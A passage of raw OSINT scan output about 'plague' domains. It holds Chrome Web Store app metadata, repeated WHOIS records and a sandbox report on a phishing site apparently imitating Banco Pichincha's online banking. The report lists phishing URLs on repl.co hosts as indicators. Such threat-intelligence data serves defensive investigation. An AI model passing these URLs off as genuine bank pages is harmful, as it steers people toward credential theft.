"https://lh3.googleusercontent.com/0_Mq-WxO413qMWau9uPHeHGIf8oFRv6Pr-BYRbRI6hUWCZAeR2EyFBZsrsNatcARd1rEtJMgKqM=w128-h128-e365"}, "risk": {"metadata": {}, "total": 91, "webstore": {"website": 1, "privacy_policy": 1, "last_updated": 5, "users": 1, "address": 1, "total": 11, "support_site": 1, "rating_users": 1}, "permissions": {"total": 80}}, "related": {"piamnadekmbodeiimejmegflchadggmh": {"rating": 3.2055554, "users": 10000, "platform": "", "short_description": "Choose a Virus, Bacteria or Parasite then upgrade and spread your disease across the world in an attempt to overtake the human race!", "icon": "https://lh3.googleusercontent.com/qKxm4GKoTwtCrlGzq-R99mOkHlkun0o6mILRzTNXLUe_ZKbK9uPfzT9jlcf4ybCuGYm8AQCHeISCWuUagDorKjk4Eg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 180, "name": "Pandemic 2"}, "jgaeopgjojikeoiidmfaejkifhgjoooe": {"rating": 4.1774006, "users": 200000, "platform": "", "short_description": "Command & Conquer Tiberium Alliances introduces an all new way to play with your friends in a browser-based, free to play strategy\u2026", "icon": "https://lh3.googleusercontent.com/SHJ9waduwbmAP1N8APS22MO-6jknRoVdKhhk3pOGGyQvfTYTghPOowts7-UmXIcXaIHwo6AAoPs9kOIByoq0W5enVx0=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4301, "name": "Command & Conquer Tiberium Alliances"}, "fmfibdjbnmndigbklnlllakjbjheiopj": {"rating": 4.670669, "users": 80000, "platform": "", "short_description": "Defend your Kingdom against the forces of evil in this awesome sequel of the epic tower defense game!", "icon": "https://lh3.googleusercontent.com/wu5zLD3jvbWc9uM_VYT1oN5jJzNQ8_3yZ_rc_ovT-Mkl4FCmic6btZ8Oi1xSowhbkeoUQ6S2V2YAN85spLeO-eSw8Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1749, "name": "Kingdom Rush Frontiers"}, "bofmomibemibekfhdnbndompcedgimfl": {"rating": 3.931174, "users": 10000, "platform": "", "short_description": "Might and Magic Heroes Online - Easy to pick up, beautiful & for free. Play it your way by yourself or with friends!", "icon": "https://lh3.googleusercontent.com/8bHGiLjl0PwDAltU95Z1CZiqLsdp5GZOxR0bthAz-wGBXy5f36WuFx3W0UrA2C6DK3ygcBbn019I76bZ5qfhWcUMx_g=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 247, "name": "Might and Magic Heroes Online"}, "gohldomknihdgjdinaabghnpnkjhkgcm": {"rating": 3.7919075, "users": 10000, "platform": "", "short_description": "Lunaria Story is a 2D, side-scrolling, massively multiplayer online role-playing game (MMORPG).", "icon": "https://lh3.googleusercontent.com/rYfXlSeN63sJW6ll6pKFK-MqErn5KGPgUz7qxlikWS3SUyAGcEJBDS38OKLMBTqbQxDZrqz-1Yp0aysTJBUnIaUu=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 173, "name": "Lunaria Story"}, "khgabmflimjjbclkmljlpmgaleanedem": {"rating": 4.4696846, "users": 200000, "platform": "", "short_description": "The only chess game that puts fun first. Play against the computer or challenge your friends online!", "icon": "https://lh3.googleusercontent.com/7rE6PLLaxuDaQYoBzsNvdrRCGyHGAEWXNGyNcAAOVkDNnbvJMw6WGHIknQy4xF_w33MrPkNquEC-Q7CKzBOh4_3Log=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 6119, "name": "SparkChess"}, "ppmiljlihhlfoekfknliaimndefafdml": {"rating": 3.8549619, "users": 10000, "platform": "", "short_description": "Fight with elves and dwarves against orcs and the forces of evil! Defend your city and become the most powerful lord of all!", "icon": "https://lh3.googleusercontent.com/XEp8ZomRS2zcjXMgyxguYq63-oZdJyXjLndPVteO79qXVwuVeYX5cgZTKFz1lE2rZ-rba7r1_hVNrROK7hqYRzIA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 131, "name": "Shadow Kings"}, "clkfdgnfefjmciocbhnffnbpkjpdleca": {"rating": 3.8338633, "users": 70000, "platform": "", "short_description": "Throw on your overalls and hit the fields!
Take home the blue ribbon as farmer of the year!", "icon": "https://lh3.googleusercontent.com/-biu79UGgMFr7LA32bnfg26g8pssU8e_Uvta1ysUUa1ainkKHGQdlBDTHKpKGGtc5rC254AVzmDmtNvqBr_VomUHHg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1258, "name": "FARMERAMA"}, "kkiklippbohodiogcpjgbjagfbajpobc": {"rating": 3.8280256, "users": 10000, "platform": "", "short_description": "Do you have what it takes to become a Legend? Gather your forces and prepare your heroes for battle in Legends of Honor!", "icon": "https://lh3.googleusercontent.com/4xUCZSCGvpG6yrO75panShmTUmoqOIVgWkPNMVzaQQUZf1tJnjKAqIsD6VPrtXPW7Yx1DIMvTHSnCicc0MOuFgUB=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 157, "name": "Legends of Honor"}, "beoejcompfcffbdhaknieiimbkakdbof": {"rating": 3.813187, "users": 23071, "platform": "", "short_description": "Help fire boy and water girl in their adventure.", "icon": "https://lh3.googleusercontent.com/Mi8D4FGay9rMrsOzg2ZsG5O8PN8vFSYRieCdbBjg6pT1JtCbd8Vf5tBlVeVG2rCfUReMLntT7AY=w128-h128-e365", "rating_users": 91, "name": "Fireboy And Watergirl"}, "hgmpilchchdmdnibhgnjjbghglgffgjp": {"rating": 3.74, "users": 9000, "platform": "", "short_description": "The 2nd World War: Tank clashes, Naval battles, Air combat. In Call of War you rewrite the course of history!", "icon": "https://lh3.googleusercontent.com/rca81fkmlP_1deL76lVVgQFDHHJXV_nrrgWrhh7fjRpGxlaiJ0LI7fDh-kcT_s0XFy4c48qzyB04TgzXqxpDlA3_=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 100, "name": "Call of War"}, "anaphblkfplenhkephgneolhnmjminjg": {"rating": 4.038013, "users": 100000, "platform": "", "short_description": "In Forge of Empires, you control the fate of your city throughout different historical periods.", "icon": "https://lh3.googleusercontent.com/o7i1oeutKe1UW8s0ECUXnCi6VplTAYUoMLQp7S9ba9f1efR1X7M7jFlgS49CclfFbMRwhHBtmDDkEyP9Yj2Az439qA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2315, "name": "Forge of Empires"}, "apkldkehnmnkbcgkjbgchjghikcggpog": {"rating": 3.2212389, "users": 20000, "platform": "", "short_description": "Online webbrowser strategy game in a post apocolypitic world. Can you keep your town save from disaster?.", "icon": "https://lh3.googleusercontent.com/0KswqoNp3hk_FgGlha8lmXu-HFJWa3qpgiYFGU3LrU-wByWj5oP-rlJwo0X06dhrE9Sp-erRV3zqs5zI0FQfNfn-R9E=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 226, "name": "The Outbreak - Webbrowser strategy game"}, "agcokacflmihcgkgjofglkhobjkheeic": {"rating": 3.8041544, "users": 30000, "platform": "", "short_description": "Destiny calls. Will you die a wretched slave, or stand firm as a hero?", "icon": "https://lh3.googleusercontent.com/oTY2iF97936IRTmOkZkx-MxwWIvePEvhsEp5yn8SUpkJrafBb3saf-EHkzhbLqrtfpz6bEjy=w128-h128-e365", "rating_users": 337, "name": "Sparta: War of Empires"}, "llmmanebcflnklopeacnlgkpiehfacmd": {"rating": 3.958115, "users": 20000, "platform": "", "short_description": "Build a powerful army, show no mercy, and battle enemies for earth's last remaining resources in this massive real-time strategy\u2026", "icon": "https://lh3.googleusercontent.com/4DtWVAXXT8ndzKB9YfQArB4A6w3qcTI8bQVg2Im1vRDF6Pqdg7V14P3a6MKXBcsHumlr95n88bvwfJolkQkZgiVE=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 382, "name": "War Commander"}, "kkgkognjknhcgbgbeijjondlikfkgnog": {"rating": 4.0218296, "users": 60000, "platform": "", "short_description": "Build magnificent cities, forge mighty alliances, utilize the power of the gods, conquer the world!", "icon": "https://lh3.googleusercontent.com/DicNXkYIbO-QUz_W3yfBwAs7qIk53yXJIP43hOOIt99y2-daHB0rwKkYPTTv76ItPjbbDqQ77UMFV12LNg_IHPtRMNI=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 962, "name": "Grepolis"}, "jfknmahjfliijedjbhonlmjenllgjhgj": {"rating": 3.8932583, "users": 84980, "platform": "", "short_description": "Battle live players in this turn-based artillery game!", "icon": "https://lh3.googleusercontent.com/IgOZ8fb6-DdXq5c60EdLxFv51B5mUeyXdp4yqEVyGP9h3OBTY0Jpo1upRAr-DzlDW4sWSwUG=w128-h128-e365", "rating_users": 178, "name": "Territory War 3"}, "hondhndnlnmjbmlgjigpicjoijbecdgn": {"rating": 3.6326923, "users": 90000, "platform": "", "short_description": "Brutal mercenary warfare, bleeding-edge technology, no holds barred.", "icon": "https://lh3.googleusercontent.com/n-nIo0f73nDmoRGSdd4XTETH15Wu6z2dgBNH7i7xYo4-GHhA1G3IDOmUONbdG1OZhVTlg5PT7jE=w128-h128-e365", "rating_users": 520, "name": "Soldiers Inc."}}, "manifest": {"oauth2": {"scopes": [], "client_id": "133701689125-jj0hr4gb0ff4ulsbrn0uk2i4th946d4c.apps.googleusercontent.com"}, "arc_metadata": {"apkList": ["app-release"], "enableExternalDirectory": false, "useGoogleContactsSyncAdapter": false, "usePlayServices": ["gcm"], "orientation": "landscape", "formFactor": "fullscreen", "packageName": "com.miniclip.plagueinc", "resize": "reconfigure", "name": "com.miniclip.plagueinc"}, "name": "Plague Inc", "default_locale": "en", "icons": {"128": "icon.png", "16": "icon.png"}, "app": {"background": {"page": "app_main.html"}}, "requirements": {"3D": {"features": ["webgl"]}}, "offline_enabled": true, "version": "1342", "manifest_version": 2, "import": [{"id": "mfaihdlpglflfgpfjcifdjdjcckigekc"}], "update_url": "https://clients2.google.com/service/update2/crx", "permissions": ["gcm", {"socket": ["tcp-connect", "tcp-listen", "udp-bind", "udp-send-to", "resolve-host"]}, "unlimitedStorage", "notifications", "clipboardRead", {"fileSystem": ["write"]}, "https://clients2.google.com/", "videoCapture", "clipboardWrite", "identity.email", "alarms", "storage", "identity", "audioCapture"]}}, "extension_id": "dnejacfgfaldfjameaaaledklokkacbc"}] plague.fun 2022-12-18 00:20:46 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.me plague.fun 2022-12-18 00:08:17 Netblock Membership No RIPE 1 0 2 0 None 104.21.16.0/20 104.21.28.240 2022-12-18 00:09:11 Open TCP Port No LeakIX 0 0 2 0 None 172.67.190.129:80 172.67.190.129 2022-12-18 00:32:28 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None registrar-abuse@google.com Domain Name: plague.wtf Registry Domain ID: 91b300be317945ac9a02c110d39076e9-DONUTS Registrar WHOIS Server: whois.donuts.co Registrar URL: http://domains.google.com Updated Date: 2022-08-29T00:47:50Z Creation Date: 2020-07-15T00:47:31Z Registry Expiry Date: 2023-07-15T00:47:31Z Registrar: Google Inc. Registrar IANA ID: 895 Registrar Abuse Contact Email: registrar-abuse@google.com Registrar Abuse Contact Phone: +1.8772376466 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Contact Privacy Inc. Customer 7151571251 Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: ON Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CA Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns-cloud-e1.googledomains.com Name Server: ns-cloud-e2.googledomains.com Name Server: ns-cloud-e3.googledomains.com Name Server: ns-cloud-e4.googledomains.com DNSSEC: signedDelegation URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:32:27Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain Name: plague.wtf Registry Domain ID: 91b300be317945ac9a02c110d39076e9-DONUTS Registrar WHOIS Server: whois.donuts.co Registrar URL: http://domains.google.com Updated Date: 2022-08-29T00:47:50Z Creation Date: 2020-07-15T00:47:31Z Registry Expiry Date: 2023-07-15T00:47:31Z Registrar: Google Inc. Registrar IANA ID: 895 Registrar Abuse Contact Email: registrar-abuse@google.com Registrar Abuse Contact Phone: +1.8772376466 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Contact Privacy Inc. Customer 7151571251 Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: ON Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CA Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns-cloud-e1.googledomains.com Name Server: ns-cloud-e2.googledomains.com Name Server: ns-cloud-e3.googledomains.com Name Server: ns-cloud-e4.googledomains.com DNSSEC: signedDelegation URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:32:27Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis 2022-12-18 00:06:57 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://pichincha-owe.outlookv.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"pichincha-owe.outlookv.repl.co"\n "wwwh1.pichincha.com"\n "x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarBE58.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarBE37.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "184.31.135.120:80"\n "200.0.63.51:443"\n "184.31.203.241:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9b8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_9b8_IESQMMUTEX_0_331"\n "IsoScope_9b8_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_9b8_IE_EarlyTabStart_0xef4_Mutex"\n "IsoScope_9b8_ConnHashTable<2488>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_9b8_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2488"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "R8HUON2P.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\R8HUON2P.txt]- [targetUID: 00000000-00002488]\n Dropped file: "8UEV0GDE.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8UEV0GDE.txt]- [targetUID: 00000000-00003876]\n Dropped file: "K4AOX4OR.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\K4AOX4OR.txt]- [targetUID: 00000000-00002488]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabBE57.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "CabBE36.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "CabBE57.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"- Location: [%TEMP%\\CabBE57.tmp]- [targetUID: 00000000-00003876]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00002488]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003876]\n "~DFBB8BE46C19875B8D.TMP" has type "data"- Location: [%TEMP%\\~DFBB8BE46C19875B8D.TMP]- [targetUID: 00000000-00002488]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "R8HUON2P.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\R8HUON2P.txt]- [targetUID: 00000000-00002488]\n "Z0MTS26S.htm" has type "HTML document UTF-8 Unicode text with very long lines"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\Z0MTS26S.htm]- [targetUID: 00000000-00003876]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002488]\n "6399055E5DDC20781CB1B49666322796" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6399055E5DDC20781CB1B49666322796]- [targetUID: 00000000-00003876]\n "EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619]- [targetUID: 00000000-00003876]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003876]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003876]\n "TarBE58.tmp" has type "data"- Location: [%TEMP%\\TarBE58.tmp]- [targetUID: 00000000-00003876]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "8UEV0GDE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8UEV0GDE.txt]- [targetUID: 00000000-00003876]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002488]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://pichincha-owe.outlookv.repl.co/"\n Pattern match: "https://pichincha-owe.outlookv.repl.co"\n Heuristic match: "x1.c.lencr.org"\n Heuristic match: "GET / HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: x1.c.lencr.org"\n Heuristic match: "pichincha-owe.outlookv.repl.co"\n Heuristic match: "wwwh1.pichincha.com"\n Pattern match: "https://wwwh1.pichincha.com/pichincha/omni/images/header.png"\n Pattern match: "https://bancaweb-ecuador.pichincha.repl.co/index/bancapersonal/login.html"\n Pattern match: "https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\n Pattern match: "https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: pichincha-owe.outlookv.repl.co\nDNT: 1\nConnection: Keep-Alive"\n "label="Abre la tarjeta de perfil de banco@pichincha.com" data-lpc-hover-target-id="react-target-v2-1" tabindex="0" role="button" aria-haspopup="dialog" data-is-focusable="true">